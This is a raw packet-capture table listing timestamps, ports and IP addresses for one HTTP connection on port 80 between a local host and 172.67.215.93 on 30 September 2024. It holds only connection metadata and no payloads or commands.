Sep 30, 2024 15:10:14.365426064 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.365660906 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.365714073 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.365902901 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.365902901 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.365902901 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.366091967 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.369083881 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.369112968 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.369179964 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.369319916 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.369405031 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.369460106 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.369529963 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.369533062 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.369582891 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.369693041 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.369709015 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.369744062 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.369793892 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.369937897 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.370059013 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.370073080 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.370085955 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.370106936 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.370165110 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.370213985 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.370280981 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.370332956 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.370452881 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.370452881 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.370608091 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.370608091 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.370608091 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.370625019 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.370637894 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.370799065 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.370970964 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.401814938 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.401834011 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.401913881 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.401928902 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.402101040 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.402101040 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.402349949 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.402374983 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.402551889 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.402569056 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.402643919 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.402829885 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.404586077 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.404602051 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.404877901 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.405023098 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.405023098 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.405071020 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.405086994 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.405128002 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.405405998 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.405405998 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.410309076 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.410327911 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.410343885 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.410357952 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.410451889 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.410619974 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.410778999 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.410813093 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.410828114 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.410841942 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.410949945 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.411130905 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.411130905 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.411983967 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.411998034 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.412010908 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.412101984 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.412244081 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.412406921 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.412434101 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.412448883 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.412461996 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.412477016 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.412504911 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.412596941 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.412764072 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.414355993 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.414371014 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.414432049 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.414628029 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.414650917 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.414650917 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.414695978 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.414710999 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.414820910 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.414843082 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.414896965 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.414958954 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.414990902 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.414990902 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.415014982 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.415186882 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.415268898 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.415282965 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.415297031 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.415363073 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.415363073 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.415503025 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.415503025 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.415503025 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.415555954 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.415641069 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.415654898 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.415668011 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.415841103 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.415841103 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.416373014 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.416390896 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.416404963 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.416593075 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.416754961 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.416827917 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.416971922 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.417021990 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.417028904 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.417149067 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.417198896 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.417368889 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.417368889 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.417692900 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.417817116 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.417867899 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.417882919 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.418251038 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.418251038 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.418251038 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.418251038 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.418576956 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.418700933 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.418724060 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.418808937 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.419205904 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.419205904 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.419588089 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.419682980 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.419759989 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.419775963 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.419869900 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.420346975 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.420361996 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.420586109 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.420598984 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.420605898 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.420614004 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.420980930 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.421278000 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.421386003 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.421466112 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.421480894 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.421664000 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.421664000 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.421847105 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.422126055 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.422169924 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.422224998 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.422239065 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.422425985 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.422425985 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.422832966 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.422878027 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.422996998 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.423049927 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.423337936 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.423337936 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.423337936 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.423702002 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.423749924 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.423814058 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.423866034 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.424309969 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.424309969 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.424309969 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.424525023 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.424571037 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.424626112 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.424639940 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.424669027 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.425395966 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.425431013 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.425448895 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.425532103 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.425549030 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.425743103 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.426364899 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.426429033 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.426460028 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.426636934 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.426651955 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.426820040 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.427133083 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.427177906 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.427366018 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.427366018 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.427433014 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.427484035 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.427711964 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.428036928 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.428050995 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.428512096 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.428512096 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.428549051 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.428591013 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.428607941 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.428622007 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.428870916 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.428870916 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.429346085 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.429394960 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.429450989 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.429502964 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.429689884 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.429856062 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.430159092 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.430174112 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.430187941 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.430279016 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.430627108 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.430627108 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.431071997 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.431225061 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.431257963 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.431365013 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.431513071 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.431513071 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.431513071 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.431936979 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.431984901 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.431998968 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.432085037 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.432106972 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.432326078 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.432326078 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.433233976 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.433305979 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.433320045 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.433392048 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.433418989 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.433453083 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.433566093 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.433592081 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.433669090 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.433682919 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.433711052 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.433881998 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.433881998 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.433881998 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.434345007 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.434493065 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.434535027 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.434561014 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.434576035 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.434747934 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.434895992 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.435329914 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.435343981 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.435358047 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.435370922 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.435501099 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.435720921 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.436284065 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.436299086 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.436314106 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.436326981 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.436568975 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.436568975 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.436738968 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.436856031 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.436939001 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.436991930 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.437005043 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.437177896 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.437177896 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.437346935 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.437762022 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.437808990 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.437901020 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.437952995 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.438087940 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.438087940 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.438257933 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.438831091 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.438867092 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.439094067 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.439137936 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.439137936 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.439166069 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.439213991 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.439263105 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.439321041 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.439512014 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.440031052 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.440087080 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.440100908 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.440114021 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.440469027 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.440469027 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.440789938 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.440804958 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.440875053 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.440926075 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.441073895 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.441242933 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.441685915 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.441725969 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.441943884 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.441971064 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.441971064 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.441992044 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.442142010 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.442189932 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.442712069 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.442753077 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.442806005 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.442852974 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.442857981 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.443193913 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.443193913 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.443319082 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.443417072 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.443470001 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.443484068 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.443506956 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.443896055 CEST	49754	80	192.168.11.20	172.67.215.93
